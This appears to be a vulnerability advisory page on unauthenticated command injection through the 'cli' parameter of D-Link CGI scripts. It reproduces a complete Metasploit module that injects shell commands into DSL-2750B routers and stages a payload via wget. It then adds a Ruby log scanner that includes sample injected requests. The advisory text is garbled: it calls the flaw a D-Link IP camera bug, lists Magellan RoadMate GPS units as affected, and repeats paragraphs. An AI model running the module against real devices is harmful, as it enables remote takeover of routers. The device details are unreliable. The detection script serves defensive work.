This issue exists because the login.cgi script accepts unauthenticated input via the cli parameter, which is passed on the command line. The device also permits access to the CGI over HTTP, which allows remote attackers to issue arbitrary commands, and these unauthenticated commands can be exploited to cause remote code execution. In certain vulnerable versions of the firmware, access to the remote CGI also allows unauthenticated command injection. These devices are prone to code injection attacks because the login.cgi script does not require authentication for all remote commands.

Existing proof-of-concept scripts for these devices demonstrate how the login.cgi script can be used to access other administrative functions.

In addition to the login.cgi script, these devices also permit remote attackers to access the device via SSH, which may be exploited for unauthenticated command execution. SSH access can be enabled as part of setting up new devices or as a maintenance function.

Vulnerability overview

This vulnerability affects multiple models of D-Link IP Cameras. It exists because the login.cgi script accepts unauthenticated input via the cli parameter, which is passed on the command line, and because the device permits access to the CGI over HTTP, so remote attackers can issue arbitrary commands that lead to remote code execution. In certain vulnerable versions of the firmware, access to the remote CGI also allows unauthenticated command injection. These devices are prone to code injection attacks because the login.cgi script does not require authentication for all remote commands.

Vulnerable Devices

The following devices are vulnerable to CVE-2016-20017:

Magellan RoadMate RM 1055
Magellan RoadMate RM 1255

CVE-2016-20018

This issue exists because the web.cgi script accepts unauthenticated input via the cli parameter, which is passed on the command line. The device also permits access to the CGI over HTTP, which allows remote attackers to issue arbitrary commands, and these unauthenticated commands can be exploited to cause remote code execution. In certain vulnerable versions of the firmware, access to the remote CGI also allows unauthenticated command injection. These devices are prone to code injection attacks because the web.cgi script does not require authentication for all remote commands.

Existing proof-of-concept scripts for these devices demonstrate how the web.cgi script can be used to access other administrative functions, in addition to performing HTTP GET requests against other parts of the device's configuration or running a custom application on it, such as a web server or database server.

Exploit

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'D-Link DSL-2750B OS Command Injection',
      'Description'    => %q(
        This module exploits a remote command injection vulnerability in D-Link DSL-2750B devices.
        Vulnerability can be exploited through "cli" parameter that is directly used to invoke
        "ayecli" binary. Vulnerable firmwares are from 1.01 up to 1.03.
      ),
      'Author'         =>
        [
          'p@ql', # vulnerability discovery
          'Marcin Bury <marcin[at]threat9.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['PACKETSTORM', 135706],
          ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/53'],
          ['URL', 'http://www.quantumleap.it/d-link-router-dsl-2750b-firmware-1-01-1-03-rce-no-auth/']
        ],
      'Targets'        =>
        [
          [
            'Linux mipsbe Payload',
            {
              'Arch' => ARCH_MIPSBE,
              'Platform' => 'linux'
            }
          ],
          [
            'Linux mipsel Payload',
            {
              'Arch' => ARCH_MIPSLE,
              'Platform' => 'linux'
            }
          ]
        ],
      'DisclosureDate'  => 'Feb 5 2016',
      'DefaultTarget'   => 0))

    deregister_options('CMDSTAGER::FLAVOR')
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/ayefeaturesconvert.js'
    )

    unless res
      vprint_error('Connection failed')
      return CheckCode::Unknown
    end

    unless res.code.to_i == 200 && res.body.include?('DSL-2750')
      vprint_status('Remote host is not a DSL-2750')
      return CheckCode::Safe
    end

    # Match the firmware version string, e.g. AYECOM_FWVER="1.02"; the dot is escaped so it is literal
    if res.body =~ /var AYECOM_FWVER="(\d\.\d+)";/
      version = Regexp.last_match[1]
      vprint_status("Remote host is a DSL-2750B with firmware version #{version}")
      if version >= "1.01" && version <= "1.03"
        return Exploit::CheckCode::Appears
      end
    end

    CheckCode::Safe
  rescue ::Rex::ConnectionError
    vprint_error('Connection failed')
    return CheckCode::Unknown
  end

  def execute_command(cmd, _opts)
    payload = Rex::Text.uri_encode("multilingual show';#{cmd}'")
    send_request_cgi(
      {
        'method' => 'GET',
        'uri' => '/login.cgi',
        'vars_get' => {
          'cli' => "#{payload}$"
        },
        'encode_params' => false
      },
      5
    )
  rescue ::Rex::ConnectionError
    fail_with(Failure::Unreachable, "#{peer} Failed to connect to the web server")
  end

  def exploit
    print_status("#{peer} Checking target version...")

    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
    end

    execute_cmdstager(
      flavor: :wget,
      linemax: 200
    )
  end
end
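An added detection example, not part of the advisory or of the Metasploit module above: it scans web-server access-log lines for requests to login.cgi whose cli parameter, once URL-decoded, contains characters that would terminate the quoted ayecli argument or chain a second shell command, which is the shape of the module's payload. The log lines and client addresses are constructed, and the line layout assumes a common-log-format style request line.

```ruby
require 'cgi'
require 'uri'

# Constructed sample access-log lines (common log format); they are not real traffic.
SAMPLE_LOG = <<~LOG
  192.0.2.10 - - [05/Feb/2016:12:00:01 +0000] "GET /login.cgi?cli=multilingual%20show HTTP/1.1" 200 512
  192.0.2.11 - - [05/Feb/2016:12:00:02 +0000] "GET /login.cgi?cli=multilingual%20show%27%3Bid%27%24 HTTP/1.1" 200 512
  192.0.2.12 - - [05/Feb/2016:12:00:03 +0000] "GET /ayefeaturesconvert.js HTTP/1.1" 200 2048
  192.0.2.13 - - [05/Feb/2016:12:00:04 +0000] "GET /login.cgi?cli=show%20status%7Cwget%20x HTTP/1.1" 200 512
LOG

# Client address, then the quoted "METHOD target HTTP/x.y" request line.
LOG_LINE_RE = /\A(\S+) .*?"(GET|POST) (\S+) HTTP\//
# Characters that close the quoted ayecli argument or chain another shell command.
SHELL_META_RE = /['"`;|&$]|\n/

# Returns the URL-decoded value of the "cli" query parameter when the request
# targets login.cgi, or nil for any other request.
def cli_argument(target)
  uri = URI.parse(target)
  return nil unless uri.path.end_with?('/login.cgi') && uri.query
  values = CGI.parse(uri.query)['cli']
  values.empty? ? nil : values.first
rescue URI::InvalidURIError
  nil
end

# Scans log text and reports each line whose cli argument carries shell
# metacharacters. Each finding is { ip:, cli: } for an alerting pipeline.
def scan_log(text)
  text.each_line.map do |line|
    m = LOG_LINE_RE.match(line)
    next unless m
    cli = cli_argument(m[3])
    next unless cli && cli.match?(SHELL_META_RE)
    { ip: m[1], cli: cli }
  end.compact
end

if __FILE__ == $PROGRAM_NAME
  scan_log(SAMPLE_LOG).each { |f| puts "ALERT #{f[:ip]} cli=#{f[:cli].inspect}" }
end
```

A plain `multilingual show` request is reported as benign, so the rule keys on the breakout characters rather than on the endpoint alone.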

Timeline

Published on: 10/19/2022 05:15:00 UTC
Last modified on: 10/21/2022 20:19:00 UTC

References